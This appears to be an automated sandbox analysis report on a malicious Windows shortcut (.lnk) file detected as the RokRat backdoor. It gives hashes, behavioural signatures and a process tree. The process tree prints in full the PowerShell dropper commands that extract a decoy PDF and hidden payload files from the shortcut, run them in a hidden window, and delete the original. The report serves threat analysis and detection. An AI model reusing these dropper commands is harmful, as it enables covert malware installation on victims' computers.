Analysis

Max time kernel: 147s
Max time network: 152s
Platform: windows10-2004_x64
Resource: win10v2004-20240226-en
Resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
Submitted: 09/04/2024, 01:58
Behavioral task: behavioral1
Sample: b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56.lnk
Resource: win7-20240221-en

General

Target: b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56.lnk
Size: 56.2MB
MD5: 358122718ba11b3e8bb56340dbe94f51
SHA1: 0c61effe0c06d57835ead4a574dde992515b9382
SHA256: b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56
SHA512: 7c4beb041fde779e21b01f26c571026b1ba38a24002b89bc57ca6cf2bc0e6e0ff38f6a100a30e3622eff403ba7ebb572839b033f81b0663939666a443184eb01
SSDEEP: 98304:xe9nAp+et8sMdP7jKFYM0bI1/c/zNYP2wn:xIAp+etaZvdm/wG2wn
Malware Config
Signatures

Detect Rokrat payload (2 IoCs)
  resource | yara_rule
  behavioral2/memory/2024-148-0x0000000032A80000-0x0000000032B63000-memory.dmp | family_rokrat
  behavioral2/memory/2024-150-0x0000000032A80000-0x0000000032B63000-memory.dmp | family_rokrat

Blocklisted process makes network request (3 IoCs)
  flow | pid | Process
  27 | 2024 | powershell.exe
  47 | 2024 | powershell.exe
  51 | 2024 | powershell.exe

Checks BIOS information in registry (2 TTPs, 1 IoC)
BIOS information is often read in order to detect sandboxing environments.
  description | ioc | Process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | powershell.exe

Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely a geofence.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation | cmd.exe

Deletes itself (1 IoC)
  pid | Process
  208 | powershell.exe

Drops file in Windows directory (1 IoC)
  description | ioc | Process
  File created | C:\Windows\7695.dat | powershell.exe

HTTP links in PDF interactive object (1 IoC)
Detects HTTP links in interactive objects within PDF files.
  resource | yara_rule
  behavioral2/files/0x0005000000022762-26.dat | pdf_with_link_action

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | AcroRd32.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | AcroRd32.exe

Modifies Internet Explorer settings
  description | ioc | Process
  Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | AcroRd32.exe

Modifies registry class (1 IoC)
  description | ioc | Process
  Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings | powershell.exe

Suspicious behavior: EnumeratesProcesses (26 IoCs)
  pid | Process
  208 | powershell.exe
  208 | powershell.exe
  2024 | powershell.exe
  2024 | powershell.exe
  2024 | powershell.exe
  2024 | powershell.exe
  1672 | AcroRd32.exe
  1672 | AcroRd32.exe
  1672 | AcroRd32.exe
  1672 | AcroRd32.exe
  1672 | AcroRd32.exe
  1672 | AcroRd32.exe
  1672 | AcroRd32.exe
  1672 | AcroRd32.exe
  1672 | AcroRd32.exe
  1672 | AcroRd32.exe
  1672 | AcroRd32.exe
  1672 | AcroRd32.exe
  1672 | AcroRd32.exe
  1672 | AcroRd32.exe
  1672 | AcroRd32.exe
  1672 | AcroRd32.exe
  1672 | AcroRd32.exe
  1672 | AcroRd32.exe
  1672 | AcroRd32.exe
  1672 | AcroRd32.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 208 | powershell.exe
  Token: SeDebugPrivilege | 2024 | powershell.exe

Suspicious use of FindShellTrayWindow (1 IoC)
  pid | Process
  1672 | AcroRd32.exe

Suspicious use of SetWindowsHookEx (5 IoCs)
  pid | Process
  1672 | AcroRd32.exe
  1672 | AcroRd32.exe
  1672 | AcroRd32.exe
  1672 | AcroRd32.exe
  1672 | AcroRd32.exe

Suspicious use of WriteProcessMemory (64 IoCs)
Processes

C:\Windows\system32\cmd.exe (PID 2116)
  Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56.lnk
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\cmd.exe (PID 720)
    Command line: "C:\Windows\SysWOW64\cmd.exe" /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0382A8AD} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x00001090, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x004B4DD3;$lnkFile.Read($pdfFile, 0, 0x004B4DD3);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x004B5E63,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'panic.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x0058F265,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005A9;$lnkFile.Read($stringByte, 0, 0x000005A9);$batStrPath = $env:temp+'\'+'para.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0058F80E,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'price.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"&& exit
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\cmd.exe (PID 4640)
      Command line: C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 208)
      Command line: C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0382A8AD} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x00001090, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x004B4DD3;$lnkFile.Read($pdfFile, 0, 0x004B4DD3);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x004B5E63,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'panic.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x0058F265,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005A9;$lnkFile.Read($stringByte, 0, 0x000005A9);$batStrPath = $env:temp+'\'+'para.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0058F80E,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'price.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"
      - Deletes itself
      - Modifies registry class
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe (PID 1672)
        Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56.pdf"
        - Checks processor information in registry
        - Modifies Internet Explorer settings
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of SetWindowsHookEx
        - Suspicious use of WriteProcessMemory

        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (PID 1892)
          Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
          - Suspicious use of WriteProcessMemory

          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (PID 4092)
            Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=DACD951A229C6A68833AA5F48F1FD5B3 --mojo-platform-channel-handle=1740 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (PID 3112)
            Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=4C45D089C5B9D6BD4983C7455E264EB1 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=4C45D089C5B9D6BD4983C7455E264EB1 --renderer-client-id=2 --mojo-platform-channel-handle=1752 --allow-no-sandbox-job /prefetch:1

          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (PID 1508)
            Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=6473EA30E2A725634C0F34F7B266AE16 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=6473EA30E2A725634C0F34F7B266AE16 --renderer-client-id=4 --mojo-platform-channel-handle=2184 --allow-no-sandbox-job /prefetch:1

          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (PID 552)
            Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=B9D1FB36430807F2007ADCD709B6874D --mojo-platform-channel-handle=2552 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (PID 3008)
            Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D52BB1E171A1F39BE6CB6EE1F5546092 --mojo-platform-channel-handle=1808 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (PID 4556)
            Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=AA7AE9C84860EA7CB988BCE413A0187A --mojo-platform-channel-handle=1984 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

      C:\Windows\SysWOW64\cmd.exe (PID 3792)
        Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\price.bat""
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2024)
          Command line: C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden "$stringPath=$env:temp+'\'+'para.dat';$stringByte = Get-Content -path $stringPath -encoding byte;$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$scriptBlock = [scriptblock]::Create($string);&$scriptBlock;"
          - Blocklisted process makes network request
          - Checks BIOS information in registry
          - Drops file in Windows directory
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

          C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe (PID 536)
            Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\eogss3cs\eogss3cs.cmdline"

            C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe (PID 1312)
              Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7DFA.tmp" "c:\Users\Admin\AppData\Local\Temp\eogss3cs\CSCD188DF807F524EB0A737C0B8B2BFD6BA.TMP"

          C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe (PID 2244)
            Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\prt2c2kk\prt2c2kk.cmdline"

            C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe (PID 2164)
              Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F03.tmp" "c:\Users\Admin\AppData\Local\Temp\prt2c2kk\CSC80B2F9C5B38C4D1BB717C03DE6D3734B.TMP"

          C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe (PID 2448)
            Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ebh3iuyy\ebh3iuyy.cmdline"

            C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe (PID 4300)
              Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F71.tmp" "c:\Users\Admin\AppData\Local\Temp\ebh3iuyy\CSCC4B15910B91A4F46816E12DBA23D16A.TMP"

          C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe (PID 2328)
            Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jopjq113\jopjq113.cmdline"

            C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe (PID 3608)
              Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES800D.tmp" "c:\Users\Admin\AppData\Local\Temp\jopjq113\CSC7B027557D534A1AB189EBFA362BE332.TMP"

C:\Windows\System32\CompPkgSrv.exe (PID 4352)
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
Network
MITRE ATT&CK Enterprise v15
Downloads
C:\Users\Admin\AppData\Local\Temp\b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56.pdf
Filesize: 4.7MB
MD5: 29ec187f2ed2eca0953dca0a68ac3722
SHA1: a20557b2e4a8b2c5e8a735c5d2f30aeaad01726e
SHA256: 81269c3c41d957765314a1704e0ea6cdf9666eab729597207fd1cc844c749beb
SHA512: 890a37f5e8fbe4d1cef6d52ec0c7b6dbf378f3545a59cdef1d796fee0aec8662564cdfd86f019f8e6bd60d8c678b72746200a1ce917a867bd21546ed06ac2bc8